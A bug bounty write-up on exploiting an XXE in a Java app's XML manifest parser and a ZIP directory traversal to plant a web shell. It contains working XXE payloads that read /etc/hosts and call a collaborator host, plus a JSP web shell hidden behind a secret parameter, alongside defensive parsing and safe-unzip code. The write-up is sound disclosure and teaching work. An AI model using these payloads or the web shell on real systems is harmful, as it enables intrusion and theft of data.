A Tale of Two Formats: Exploiting Insecure XML and ZIP File Parsers to Create a Web Shell

XML and ZIP - A Tale as Old As Time

While researching a bug bounty target, I came across a web application that processed a custom file type. Let’s call it .xyz. A quick Google search revealed that the .xyz file type is actually just a ZIP file that contains an XML file and additional media assets. The XML file functions as a manifest to describe the contents of the package.

This is an extremely common way of packaging custom file types. For example, if you try to unzip a Microsoft Word file with unzip Document.docx, you would get:

Archive:  Document.docx
  inflating: [Content_Types].xml     
  inflating: _rels/.rels             
  inflating: word/_rels/document.xml.rels  
  inflating: word/document.xml       
  inflating: word/theme/theme1.xml   
  inflating: word/settings.xml       
  inflating: docProps/core.xml       
  inflating: word/fontTable.xml      
  inflating: word/webSettings.xml    
  inflating: word/styles.xml         
  inflating: docProps/app.xml        

Another well-known example of this pattern is the .apk Android app file, which is essentially a ZIP file that contains an AndroidManifest.xml manifest file and other assets.
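To make the pattern concrete, here is a minimal Java sketch that lists the entries of any ZIP-based package, much like the unzip output above. It is not taken from the target application, and the class name PackageLister is made up for illustration.

```java
import java.io.IOException;
import java.nio.file.Path;
import java.util.ArrayList;
import java.util.List;
import java.util.zip.ZipFile;

final class PackageLister {
    // Returns the entry names stored in a ZIP-based package, in archive order.
    static List<String> listEntries(Path archive) throws IOException {
        List<String> names = new ArrayList<>();
        try (ZipFile zip = new ZipFile(archive.toFile())) {
            // Entry names are plain strings chosen by whoever built the archive.
            zip.stream().forEach(entry -> names.add(entry.getName()));
        }
        return names;
    }

    public static void main(String[] args) throws IOException {
        for (String name : listEntries(Path.of(args[0]))) {
            System.out.println(name);
        }
    }
}
```

The point to notice is that the library hands back entry names exactly as they were written into the archive. Nothing in this code checks whether a name is a sensible relative path.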

However, if handled naively, this packaging pattern creates additional security issues. These “vulnerabilities” are actually features built into the XML and ZIP formats. Responsibility falls onto XML and ZIP parsers to handle these features safely. Unfortunately, this rarely happens, especially when developers simply use the default settings.

Here’s a quick overview of these “vulnerable features.”

XML External Entities

The XML file format supports external entities, which allow an XML file to pull data from other sources, such as local or remote files. In some cases this can be useful because it makes importing data from various sources more convenient. However, in cases where an XML parser accepts user-defined inputs, a malicious user can pull data from sensitive local files or internal network hosts.

As the OWASP Foundation wiki states:

This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser… Java applications using XML libraries are particularly vulnerable to XXE because the default settings for most Java XML parsers is to have XXE enabled. To use these parsers safely, you have to explicitly disable XXE in the parser you use.

Just like in my previous Remote Code Execution writeup, developers are put at risk by vulnerable defaults.
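For reference, explicitly disabling XXE in a Java DOM parser might look like the sketch below. It assumes the JDK's built-in JAXP implementation, which supports the Xerces disallow-doctype-decl feature. SafeXml and its method names are hypothetical.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;

final class SafeXml {
    // Builds a DOM parser that rejects any DOCTYPE declaration, which rules out
    // both internal and external entity definitions.
    static DocumentBuilder newHardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Assumption: the underlying parser is Xerces-based (true for the JDK default).
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);
        return factory.newDocumentBuilder();
    }

    // Parses untrusted manifest text; a DOCTYPE in the input causes a SAXException.
    static Document parse(String xml) throws Exception {
        return newHardenedBuilder()
                .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
    }
}
```

Rejecting DOCTYPE declarations outright is the bluntest option and only suits formats that never need a DTD. If a format does need one, the external-entity features have to be switched off individually instead.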

ZIP Directory Traversal

Although ZIP directory traversal has been exploited since the format’s inception, this attack vector gained prominence in 2018 due to Snyk’s clumsily-named “Zip Slip” research/marketing campaign that found the vulnerability in many popular ZIP parser libraries.

An attacker can exploit this vulnerability with a ZIP file that contains directory traversal filenames such as ../../../../evil1/evil2/evil.sh. When a vulnerable ZIP library tries to unzip this file, rather than unzipping evil.sh to a temporary directory, it unzips it to another location in the filesystem defined by the attacker (in this case, /evil1/evil2). This can easily lead to remote code execution if an attacker overwrites a cron job script or creates a web shell in the web root directory.

Similar to XXEs, ZIP directory traversal is especially common in Java:

The vulnerability has been found in multiple ecosystems, including JavaScript, Ruby, .NET and Go, but is especially prevalent in Java, where there is no central library offering high level processing of archive (e.g. zip) files. The lack of such a library led to vulnerable code snippets being hand-crafted and shared among developer communities such as StackOverflow.
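The usual fix is to resolve each entry name against the extraction directory and refuse anything that escapes it. Below is a minimal sketch of that check using only the Java standard library. SafeUnzip is a hypothetical name, and the code deliberately ignores other concerns such as symlinks inside the target directory and decompressed size limits.

```java
import java.io.IOException;
import java.io.InputStream;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.zip.ZipEntry;
import java.util.zip.ZipInputStream;

final class SafeUnzip {
    // Extracts every entry of the archive under targetDir and refuses any
    // entry whose resolved path would land outside targetDir.
    static void extract(InputStream archive, Path targetDir) throws IOException {
        Path root = targetDir.toAbsolutePath().normalize();
        Files.createDirectories(root);
        try (ZipInputStream zip = new ZipInputStream(archive)) {
            ZipEntry entry;
            while ((entry = zip.getNextEntry()) != null) {
                // normalize() collapses "../" segments before the containment check.
                Path resolved = root.resolve(entry.getName()).normalize();
                if (!resolved.startsWith(root)) {
                    throw new IOException("Blocked traversal entry: " + entry.getName());
                }
                if (entry.isDirectory()) {
                    Files.createDirectories(resolved);
                } else {
                    Files.createDirectories(resolved.getParent());
                    Files.copy(zip, resolved); // reads up to the end of the current entry
                }
            }
        }
    }
}
```

Path.startsWith compares whole path components, so a sibling directory such as /tmp/out2 does not pass as being inside /tmp/out. This sketch aborts on the first bad entry, on the assumption that an archive containing one traversal entry should not be trusted at all.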

Discovering the XXE

Now that we have the theoretical foundations of the attack, let’s move on to the actual vulnerability in practice. The application accepted uploads of the custom file type, unzipped them, parsed the XML manifest file, and returned a confirmation page with the manifest details. For example, if mypackage.xyz was a ZIP file containing the following manifest.xml:

<?xml version="1.0"?>
<package>
    <title>My Awesome Package</title>
    <author>John Doe</author>
</package>

I would get the following confirmation screen:

[Image: Package Info 1]

The first thing I did was test for XSS. One tip about injecting XSS via XML: a raw <htmltags> gets interpreted as an XML node, so you have to escape it in the XML as &lt;htmltags&gt;. Unfortunately, the output was sanitized properly.

The next move was to test for XXEs. Here, I made a mistake and began by testing for a remote external entity:

<?xml version="1.0"?>
<!DOCTYPE title [<!ENTITY xxe SYSTEM 'https://mycollab.burpcollaborator.net'>]>
<package>
    <title>My Awesome Package&xxe;</title>
    <author>John Doe</author>
</package>

I didn’t get a pingback on my Burp Collaborator instance and immediately assumed XXEs were blocked. This was a mistake: you should always test incrementally, starting with internal (non-SYSTEM) entities, working your way up to local files, and then remote files. This helps you eliminate possibilities along the way. After all, a standard firewall rule that blocks outgoing web connections would cause a remote external entity to fail, but that says nothing about whether local external entities are blocked.

Fortunately, I decided to try again later with a local external entity:

<?xml version="1.0"?>
<!DOCTYPE title [<!ENTITY xxe SYSTEM 'file:///etc/hosts'>]>
<package>
    <title>My Awesome Package&xxe;</title>
    <author>John Doe</author>
</package>

That’s when I struck gold. The contents of /etc/hosts appeared in the confirmation page.
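This behaviour is easy to reproduce locally. The sketch below shows what a naive server-side flow might look like. It is not the target's actual code, and NaiveManifestReader is a hypothetical name. It assumes a JDK whose default JAXP settings still resolve external entities, which is the default that OWASP warns about.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

final class NaiveManifestReader {
    // Parses a manifest with the JDK's default DOM settings and returns the
    // text of the first <title> element, as a confirmation page might display it.
    static String readTitle(String manifestXml) throws Exception {
        // Defaults left untouched: nothing here disables DOCTYPEs or external entities.
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        Document doc = factory.newDocumentBuilder()
                .parse(new ByteArrayInputStream(manifestXml.getBytes(StandardCharsets.UTF_8)));
        // By default entity references are expanded into the surrounding text.
        return doc.getElementsByTagName("title").item(0).getTextContent();
    }
}
```

When the manifest declares an entity with a file: system identifier and references it inside the title, the parser substitutes the file's contents into the text. The application then echoes that text back to the uploader.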

[Image: Package Info 2]

Pivoting to RCE

Typically in a white hat hacking scenario, you stick to a non-destructive proof-of-concept and stop there. With the XXE, I could expose local database files and several interesting web logs that included admin credentials. This was sufficient to write up a report.

However, there was another vulnerability I wanted to test: the ZIP parser. Remember that the app unzipped the package, read the manifest.xml file, and returned a confirmation page. I found an XXE in the second step, suggesting that there might be additional vulnerabilities in the rest of the flow.

To test for ZIP directory traversal, I used evilarc, a simple Python 2 script that generates ZIP files with directory traversal payloads. First, I needed to figure out where in the local file system to place my traversal payload. Here, the XXE helped. With Java’s file: URL handling, a local external entity can point at a directory as well as a file, so an external entity like file:///nameofdirectory returns a listing of the directory’s contents instead of the contents of a file.
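The directory-listing trick comes from how Java resolves file: URLs, which is what the XML parser uses under the hood for SYSTEM identifiers. The sketch below reads a file: URL directly, with no XML involved. FileUrlListing is a hypothetical name, and the listing format is an implementation detail of the JDK's file protocol handler rather than a documented guarantee.

```java
import java.io.IOException;
import java.io.InputStream;
import java.net.URL;
import java.nio.charset.StandardCharsets;
import java.nio.file.Path;

final class FileUrlListing {
    // Reads whatever Java's file: URL handler returns for the given path.
    // For a regular file that is the file's bytes; for a directory, the JDK's
    // handler produces the names of its entries, one per line.
    static String read(Path path) throws IOException {
        URL url = path.toUri().toURL();
        try (InputStream in = url.openStream()) {
            return new String(in.readAllBytes(), StandardCharsets.UTF_8);
        }
    }
}
```

Calling FileUrlListing.read on a directory path should return its file names separated by newlines. This is why an entity pointing at a directory lets you browse the file system one level at a time.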

With a little digging through the directories, I eventually came across a file located at /home/web/resources/templates/sitemap.jsp. Its contents matched a page in the application - https://vulnapp.com/sitemap. I zipped the contents of the sitemap page along with a web shell as ../../../../../../home/web/resources/templates/sitemap.jsp in my package. I kept the web shell hidden via a secret URL parameter to prevent casual users from accidentally coming across it:

<%@ page import="java.util.*,java.io.*"%>
<%
    // Only run when the secret parameter is present, so the page looks normal otherwise.
    if (request.getParameter("spaceraccoon") != null) {
        out.println("Command: " + request.getParameter("spaceraccoon") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("spaceraccoon"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
            out.println(disr);
            disr = dis.readLine();
        }
    }
%>

I uploaded my package, browsed to https://vulnapp.com/sitemap?spaceraccoon=ls and… nothing. The page looked exactly the same.

A common saying goes:

The definition of insanity is doing the same thing over and over again and expecting a different result.

This does not apply to black box testing. Latency, caching, and other quirks of the web can return different outputs for the same input. In this case, the server had cached the original version of https://vulnapp.com/sitemap, which is why it initially returned the page without my web shell. After several refreshes, my web shell kicked in, and the page returned the contents of the web root directory along with the rest of the sitemap page contents. I was in.

Convention over Configuration

[Image: Configuration Meme]

From the writeup, you might have noticed that I was dealing with a Java application. This brings us back to OWASP and Snyk’s warnings that Java is especially prone to mishandling XML and ZIP files. Due to a combination of unsafe XML parser defaults and the lack of a central, high-level archive library, developers are forced to rely on random Stack Overflow snippets or third-party libraries.

However, Java is not the only culprit. Mishandling of XML and ZIP files occurs across programming languages and frameworks. Developers are expected to go out of their way to configure third-party libraries and APIs safely, and a single mistake is enough to introduce a vulnerability into an application. The probability of such a mistake increases with every additional “black box” library.

One approach to reduce vulnerabilities in development is Spotify’s “Golden Path”:

At Spotify, one of our engineering strategies is the creation and promotion of the use of “Golden Paths.” Golden Paths are a blessed way to build products at Spotify. They consist of a set of APIs, application frameworks, best practices, and runtime environments that allow Spotify engineers to develop and deploy code safely, securely, and at scale. We complement these with opt-in programs that help increase quality. From our bug bounty program reports, we’ve found that the more that development adheres to a Golden Path, the less likely there is to be a vulnerability reported to us.

This boils down to a simple Ruby on Rails maxim: “Convention over configuration.”

Rather than relying on thousands of engineers to individually remember all the quirks of web application security, it is a lot more efficient to focus on a battle-tested set of frameworks and APIs and reduce the need to constantly tweak these settings.

Fortunately, organizations can solve this in a systemic manner by adhering to convention over configuration.

Major thanks to the security team behind the bug bounty program, who fixed the vulnerability in less than 12 hours and gave the go-ahead to publish this writeup.